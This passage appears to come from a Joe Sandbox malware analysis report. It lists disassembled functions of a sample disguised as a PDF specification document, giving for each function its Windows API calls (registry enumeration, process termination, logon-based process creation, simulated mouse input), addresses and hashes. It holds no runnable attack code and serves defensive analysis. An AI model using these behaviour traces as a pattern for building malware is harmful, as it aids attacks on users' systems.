                                        • Part of subcall function 003A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A30AF
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A30EF
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003A3112
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003A313B
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003A317E
                                      • RegCloseKey.ADVAPI32(00000000), ref: 003A318B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                      • String ID:
                                      • API String ID: 3451389628-0
                                      • Opcode ID: cfacd1329dc53c79b984d20cba1638ac87e739044611fa6ecf8d270f90ef7931
                                      • Instruction ID: b8b19ee7102746945c59f22ad8a04b3bed8dee1a7a2e49b5316bd1e006c3fec7
                                      • Opcode Fuzzy Hash: cfacd1329dc53c79b984d20cba1638ac87e739044611fa6ecf8d270f90ef7931
                                      • Instruction Fuzzy Hash: AE513831218300AFC706EF64CC85E6ABBE9FF89304F04496DF5559B2A1DB71EA05CB52
                                      Function 00376F40 Relevance: 9.2, APIs: 6, Instructions: 159memoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0036F82F: SetFilePointerEx.KERNEL32(00000000,00000002,?,?,?,00000000,?,?,?,?,0036B11C,?,00000000,00000000,00000002,?), ref: 0036F866
                                        • Part of subcall function 0036F82F: GetLastError.KERNEL32(?,0036B11C,?,00000000,00000000,00000002,?,?,?,?,0036AFE4,?,00000002,?,003F6E48,00000010), ref: 0036F870
                                      • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,003EEEF4,00000001,00000000,?,?,00376071,003EEEF4,0000000C,00000080), ref: 00376FA9
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,003EEEF4,00000001,00000000,?,?,00376071,003EEEF4,0000000C,00000080), ref: 00376FB0
                                      • GetProcessHeap.KERNEL32(00000000,003EEEF4,?,?,?,?,?,?,?,?,003EEEF4,00000001,00000000,?,?,00376071), ref: 00377050
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,003EEEF4,00000001,00000000,?,?,00376071,003EEEF4), ref: 00377057
                                      • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,003EEEF4,00000001,00000000,?,?,00376071), ref: 0037708D
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,003EEEF4,00000001,00000000,?,?,00376071,003EEEF4), ref: 003770BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                      • String ID:
                                      • API String ID: 1354853467-0
                                      • Opcode ID: f8c21078086291e086db170626a7ee9a915ce5d6c0695fbf8f82aa12101ed043
                                      • Instruction ID: eee77123e764432e7669a82933ef121919236b3207406f4cff438d701889fb17
                                      • Opcode Fuzzy Hash: f8c21078086291e086db170626a7ee9a915ce5d6c0695fbf8f82aa12101ed043
                                      • Instruction Fuzzy Hash: 29411931A00510ABDB336BB89C46BAE7EB4EF05720F15C665F428EB2D1D73C994187A1
                                      Function 003A84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenu.USER32(?), ref: 003A8540
                                      • GetMenuItemCount.USER32(00000000), ref: 003A8577
                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003A859F
                                      • GetMenuItemID.USER32(?,?), ref: 003A860E
                                      • GetSubMenu.USER32(?,?), ref: 003A861C
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 003A866D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountMessagePostString
                                      • String ID:
                                      • API String ID: 650687236-0
                                      • Opcode ID: ce530c0d46c05ae06d445e594ff014cb3123934fe3b17e5e1a2b8477b8c70b48
                                      • Instruction ID: 8d67ab3199a4f0513c38bd99b0164db5bac77e968391971d2fa3e3e8660d540f
                                      • Opcode Fuzzy Hash: ce530c0d46c05ae06d445e594ff014cb3123934fe3b17e5e1a2b8477b8c70b48
                                      • Instruction Fuzzy Hash: 64519075E00215AFDB16EF94C941AAEB7F9EF49310F114469F915BB361CB30BE418B90
                                      Function 0035ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • BeginPaint.USER32(?,?,?), ref: 0035AC2A
                                      • GetWindowRect.USER32(?,?), ref: 0035AC8E
                                      • ScreenToClient.USER32(?,?), ref: 0035ACAB
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0035ACBC
                                      • EndPaint.USER32(?,?,?,?,?), ref: 0035AD06
                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003BE673
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                      • String ID:
                                      • API String ID: 2592858361-0
                                      • Opcode ID: 3e884d882ae26d70d5cbacfdf99a74eaf572a954578fe8ec67dc7b9d3e2415b4
                                      • Instruction ID: af20013d1fb102a9ce083687ef840b337980b6ac9d1fc7aeef9baa9c1aae1a3f
                                      • Opcode Fuzzy Hash: 3e884d882ae26d70d5cbacfdf99a74eaf572a954578fe8ec67dc7b9d3e2415b4
                                      • Instruction Fuzzy Hash: C4419F711046009FC712DF28CC84FAA7BF8AB59325F040769FAA4D72B1C731A848EB62
                                      Function 003AE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(00401628,00000000,00401628,00000000,00000000,00401628,?,003BDC5D,00000000,?,00000000,00000000,00000000,?,003BDAD1,00000004), ref: 003AE40B
                                      • EnableWindow.USER32(00000000,00000000), ref: 003AE42F
                                      • ShowWindow.USER32(00401628,00000000), ref: 003AE48F
                                      • ShowWindow.USER32(00000000,00000004), ref: 003AE4A1
                                      • EnableWindow.USER32(00000000,00000001), ref: 003AE4C5
                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 003AE4E8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: bbc5770464d90d7352188402daecebf2de0fa2718d4978a3cd04370aa2d4b7e0
                                      • Instruction ID: b2376b8a95128bc298852f0aff836cb3c1a7a2c8266425428163efa8503e32a0
                                      • Opcode Fuzzy Hash: bbc5770464d90d7352188402daecebf2de0fa2718d4978a3cd04370aa2d4b7e0
                                      • Instruction Fuzzy Hash: D7414934601151EFDB23CF29C499F947BE9FB4A304F5981B9FA588F2A2C731A842CB51
                                      Function 003898BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 003898D1
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00389908
                                      • EnterCriticalSection.KERNEL32(?), ref: 00389924
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0038999E
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003899B3
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 003899D2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                      • String ID:
                                      • API String ID: 3368777196-0
                                      • Opcode ID: d6638596ea3961ef4e32da76df10bda6f4449e6d1b238467f84cfd0c8cec7196
                                      • Instruction ID: d4655f2b14e37f3da731991401e77713dbb2cb6564ab06d30d349ec468536097
                                      • Opcode Fuzzy Hash: d6638596ea3961ef4e32da76df10bda6f4449e6d1b238467f84cfd0c8cec7196
                                      • Instruction Fuzzy Hash: E6315071900205EFDB12AF95DC85EAAB778FF45311F1480B9F904EB256D774EA14CBA0
                                      Function 00399B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,003977F4,?,?,00000000,00000001), ref: 00399B53
                                        • Part of subcall function 00396544: GetWindowRect.USER32(?,?), ref: 00396557
                                      • GetDesktopWindow.USER32 ref: 00399B7D
                                      • GetWindowRect.USER32(00000000), ref: 00399B84
                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00399BB6
                                        • Part of subcall function 00387A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
                                      • GetCursorPos.USER32(?), ref: 00399BE2
                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00399C44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                      • String ID:
                                      • API String ID: 4137160315-0
                                      • Opcode ID: 5a15fe19bb8b418f95c81bd3290845dc192efc1e34d367a5b37cfb60b51ba9ad
                                      • Instruction ID: 27886254afa825554dd752843f187d3fae38fbddfba3e178e39c9f1e13b119d7
                                      • Opcode Fuzzy Hash: 5a15fe19bb8b418f95c81bd3290845dc192efc1e34d367a5b37cfb60b51ba9ad
                                      • Instruction Fuzzy Hash: BF31CE72104309ABCB11DF58DC49F9AB7EDFF89314F01092AF599E7181DA31EA04CB92
                                      Function 0037AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0037AFAE
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0037AFB5
                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0037AFC4
                                      • CloseHandle.KERNEL32(00000004), ref: 0037AFCF
                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0037AFFE
                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 0037B012
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                      • String ID:
                                      • API String ID: 1413079979-0
                                      • Opcode ID: 4b8c2c02b3ea8b45dc24b213a2756ec7543e78f068a9cf2dfecc3c768317b30e
                                      • Instruction ID: 59c3f697284a20f1de13860465e0c3d589817398381b45c9fc7b5b4807896afa
                                      • Opcode Fuzzy Hash: 4b8c2c02b3ea8b45dc24b213a2756ec7543e78f068a9cf2dfecc3c768317b30e
                                      • Instruction Fuzzy Hash: 9D214C7210560DABDB238F98DD09FAE7BADAB84304F058025FA05E6161C37A9D21EB61
                                      Function 003AEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0035AFE3
                                        • Part of subcall function 0035AF83: SelectObject.GDI32(?,00000000), ref: 0035AFF2
                                        • Part of subcall function 0035AF83: BeginPath.GDI32(?), ref: 0035B009
                                        • Part of subcall function 0035AF83: SelectObject.GDI32(?,00000000), ref: 0035B033
                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 003AEC20
                                      • LineTo.GDI32(00000000,00000003,?), ref: 003AEC34
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003AEC42
                                      • LineTo.GDI32(00000000,00000000,?), ref: 003AEC52
                                      • EndPath.GDI32(00000000), ref: 003AEC62
                                      • StrokePath.GDI32(00000000), ref: 003AEC72
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                      • String ID:
                                      • API String ID: 43455801-0
                                      • Opcode ID: 69ab0ae35fc6052cb7f07b90565a30c8927a7308cf662530ab2552fc613281a3
                                      • Instruction ID: 10e02693e4281ec42ee04cdb540c3ab8c68ac7eb6dcfd8681340797fc92827ff
                                      • Opcode Fuzzy Hash: 69ab0ae35fc6052cb7f07b90565a30c8927a7308cf662530ab2552fc613281a3
                                      • Instruction Fuzzy Hash: 9E110972000159BFEB029F94DD88EEA7F6DEB08360F048126FE0899170D771AD55DBA0
                                      Function 0037E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0037E1C0
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0037E1D1
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0037E1D8
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0037E1E0
                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0037E1F7
                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0037E209
                                        • Part of subcall function 00379AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00379A05,00000000,00000000,?,00379DDB), ref: 0037A53A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CapsDevice$ExceptionRaiseRelease
                                      • String ID:
                                      • API String ID: 603618608-0
                                      • Opcode ID: 9db2bb3b09907360df8b6b0dd19715f5b6391e3c2f56df6c10550e0b94a6c425
                                      • Instruction ID: be28ea4040b067acb2f7443fc8f8100f599c510af706fc6a769e87031e65c7dc
                                      • Opcode Fuzzy Hash: 9db2bb3b09907360df8b6b0dd19715f5b6391e3c2f56df6c10550e0b94a6c425
                                      • Instruction Fuzzy Hash: F40184B5A00214BFEB119BA5DC45F5EBFB8EB48351F018066FA08E7290D6719C00CF60
                                      Function 003427EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0034281D
                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00342825
                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00342830
                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0034283B
                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00342843
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0034284B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Virtual
                                      • String ID:
                                      • API String ID: 4278518827-0
                                      • Opcode ID: 7317c5808da91eb3118e4e7119954e660d3f54daed4230f8325df1c7413548ae
                                      • Instruction ID: 1f477a96a6675248c5c5114fe51b1dc9ff7d9e9e1e6656008233e13cb4c09c64
                                      • Opcode Fuzzy Hash: 7317c5808da91eb3118e4e7119954e660d3f54daed4230f8325df1c7413548ae
                                      • Instruction Fuzzy Hash: C70167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C87A42C7F5B864CBE5
                                      Function 00389AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 1423608774-0
                                      • Opcode ID: 0cdb3f76786459d25160c22c77101d3400f41fa6cab1a039d54d3cbe198a3cf0
                                      • Instruction ID: 198deadfc95f0b73dc454a571002de4ffd4c9ae2c6a7aea46cfb8d7b300b7ba0
                                      • Opcode Fuzzy Hash: 0cdb3f76786459d25160c22c77101d3400f41fa6cab1a039d54d3cbe198a3cf0
                                      • Instruction Fuzzy Hash: 91016236101311ABD71B3B64EC88EBB7769BF88701B09046AF503D6090DB68A801DB50
                                      Function 00387BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00387C07
                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00387C1D
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00387C2C
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00387C3B
                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00387C45
                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00387C4C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                      • String ID:
                                      • API String ID: 839392675-0
                                      • Opcode ID: aca8ec5e49cd9204005c39669dc7321d5d17eb36dc791808798e5687d6ab4138
                                      • Instruction ID: 7402b2c631e80050901b9b5598cd48022b576b65c707389c0a4158567e5aca45
                                      • Opcode Fuzzy Hash: aca8ec5e49cd9204005c39669dc7321d5d17eb36dc791808798e5687d6ab4138
                                      • Instruction Fuzzy Hash: E7F05E76241158BBE7225B529C0EEEFBF7CEFC6B11F000068FA01D1151EBA06A41C7B5
                                      Function 00389A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,?), ref: 00389A33
                                      • EnterCriticalSection.KERNEL32(?,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 00389A44
                                      • TerminateThread.KERNEL32(?,000001F6,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 00389A51
                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 00389A5E
                                        • Part of subcall function 003893D1: CloseHandle.KERNEL32(?,?,00389A6B,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 003893DB
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00389A71
                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,003B5DEE,?,?,?,?,?,0034ED63), ref: 00389A78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
